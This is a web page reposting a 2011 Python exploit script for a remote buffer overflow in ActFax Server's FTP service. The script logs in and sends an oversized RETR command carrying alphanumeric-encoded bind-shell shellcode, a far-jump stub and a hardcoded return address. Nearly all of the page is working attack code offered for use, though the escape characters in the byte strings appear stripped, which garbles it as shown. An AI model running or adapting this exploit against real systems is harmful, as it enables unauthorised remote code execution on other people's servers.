Home / exploitsPDF  

ActFax Server FTP Remote Buffer Overflow

Posted on 09 June 2011

#!/usr/bin/python

#-----------------------------------------------------------------------------------
# Exploit Title: ActFax Server FTP Remote BOF (post auth)
# Author: b33f - Ruben Boonen
# Software Link: http://www.actfax.com/download/actfax_setup_en.exe
# Tested on: Windows XP PRO SP3 (version 2002) - VMware Workstation
#-----------------------------------------------------------------------------------
# Credit goes to chap0 for discovering the bug.
# Allot of thanks to PoURaN, for helping a n00b understand assembly better!!!
#-----------------------------------------------------------------------------------

import socket
import sys

print "
ActFax XP SP3 Pro..."
print "Hunting for alphanumeric code!!
"

#-----------------------------------------------------------------------------------
# payload => win32_bind LPORT=9988 Size=709 => Encoder=PexAlphaNum
#-----------------------------------------------------------------------------------
shellcode = (
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx46x4bx4e"
"x4dx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx38"
"x4ex56x46x32x46x52x4bx48x45x34x4ex43x4bx38x4ex47"
"x45x50x4ax57x41x30x4fx4ex4bx38x4fx44x4ax41x4bx48"
"x4fx55x42x32x41x30x4bx4ex49x44x4bx48x46x33x4bx38"
"x41x30x50x4ex41x33x42x4cx49x49x4ex4ax46x58x42x4c"
"x46x57x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x42x4ax42x45x47x45x4ex4bx48"
"x4fx35x46x52x41x30x4bx4ex48x36x4bx58x4ex30x4bx44"
"x4bx58x4fx55x4ex51x41x30x4bx4ex43x30x4ex52x4bx38"
"x49x58x4ex56x46x42x4ex51x41x56x43x4cx41x33x4bx4d"
"x46x46x4bx48x43x34x42x43x4bx48x42x44x4ex50x4bx38"
"x42x47x4ex51x4dx4ax4bx38x42x54x4ax50x50x35x4ax56"
"x50x38x50x54x50x30x4ex4ex42x55x4fx4fx48x4dx48x36"
"x43x35x48x36x4ax56x43x33x44x33x4ax46x47x47x43x47"
"x44x33x4fx55x46x45x4fx4fx42x4dx4ax56x4bx4cx4dx4e"
"x4ex4fx4bx43x42x45x4fx4fx48x4dx4fx35x49x58x45x4e"
"x48x56x41x48x4dx4ex4ax30x44x50x45x35x4cx46x44x50"
"x4fx4fx42x4dx4ax56x49x4dx49x30x45x4fx4dx4ax47x55"
"x4fx4fx48x4dx43x45x43x55x43x55x43x45x43x55x43x44"
"x43x35x43x44x43x45x4fx4fx42x4dx48x36x4ax56x47x52"
"x46x30x48x36x43x55x49x38x41x4ex45x59x4ax36x46x4a"
"x4cx51x42x57x47x4cx47x45x4fx4fx48x4dx4cx56x42x31"
"x41x45x45x45x4fx4fx42x4dx4ax46x46x4ax4dx4ax50x32"
"x49x4ex47x55x4fx4fx48x4dx43x55x45x45x4fx4fx42x4d"
"x4ax56x45x4ex49x34x48x48x49x54x47x55x4fx4fx48x4d"
"x42x35x46x55x46x55x45x45x4fx4fx42x4dx43x39x4ax46"
"x47x4ex49x47x48x4cx49x57x47x45x4fx4fx48x4dx45x55"
"x4fx4fx42x4dx48x36x4cx56x46x46x48x36x4ax46x43x46"
"x4dx56x49x38x45x4ex4cx46x42x45x49x35x49x42x4ex4c"
"x49x58x47x4ex4cx46x46x44x49x38x44x4ex41x53x42x4c"
"x43x4fx4cx4ax50x4fx44x54x4dx32x50x4fx44x44x4ex32"
"x43x59x4dx58x4cx57x4ax33x4bx4ax4bx4ax4bx4ax4ax46"
"x44x47x50x4fx43x4bx48x31x4fx4fx45x37x46x44x4fx4f"
"x48x4dx4bx45x47x45x44x35x41x55x41x45x41x35x4cx56"
"x41x30x41x45x41x55x45x55x41x45x4fx4fx42x4dx4ax36"
"x4dx4ax49x4dx45x30x50x4cx43x55x4fx4fx48x4dx4cx56"
"x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx38x47x35x4ex4f"
"x43x38x46x4cx46x46x4fx4fx48x4dx44x55x4fx4fx42x4d"
"x4ax36x42x4fx4cx58x46x50x4fx55x43x35x4fx4fx48x4d"
"x4fx4fx42x4dx5a")

#-----------------------------------------------------------------------------------
# ASCII encoded  => Size=52
# Decoded opcode => E9DE140000 - JMP 0178D7A7
#-----------------------------------------------------------------------------------
farjump = (
"x25x4Ax4Dx4Ex55"     # AND EAX,554E4D4A
"x25x35x32x31x2A"     # AND EAX,2A313235
"x2Dx55x55x55x5A"     # SUB EAX,5A555555
"x2Dx55x55x55x5A"     # SUB EAX,5A555555
"x2Dx56x55x55x5B"     # SUB EAX,5B555556
"x50"                     # PUSH EAX
"x25x4Ax4Dx4Ex55"     # AND EAX,554E4D4A
"x25x35x32x31x2A"     # AND EAX,2A313235
"x2Dx5Dx60x4Ex55"     # SUB EAX,554E605D
"x2Dx5Dx60x4Ex55"     # SUB EAX,554E605D
"x2Dx5Dx60x4Ex55"     # SUB EAX,554E605D
"x50"                     # PUSH EAX
"xEBxC1")                # JMP SHORT 0112CAE0 (back to the beginning of ESP,
# ESP now points to our decoded far-jump).

#-----------------------------------------------------------------------------------
#
# At crash time our buffer is copied several times into memory (some of these are
# corrupt), so we write some fancy far-jump instruction in ESP. After this is
# decoded in memory we jump to our nop bytes (i think 3de itteration of our buffer).
# Ironically this doesn't even crash the program, only when you close the bind
# shell connection does the program crash...
#
# jmp esp - user32.dll => 0x7E429353
#-----------------------------------------------------------------------------------
buffer = "x90"*41 + shellcode + "x90"*23 + "x53x93x42x7E" + "x90"*1 + farjump + "x90"*175

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.71',21))
s.recv(1024)
s.send('USER ' + 'b33f
')
print (s.recv(1024))
s.send('PASS b33f
')
print (s.recv(1024))
s.send('RETR ' + buffer + '
')
s.close

 

TOP

Malware :

Exploits :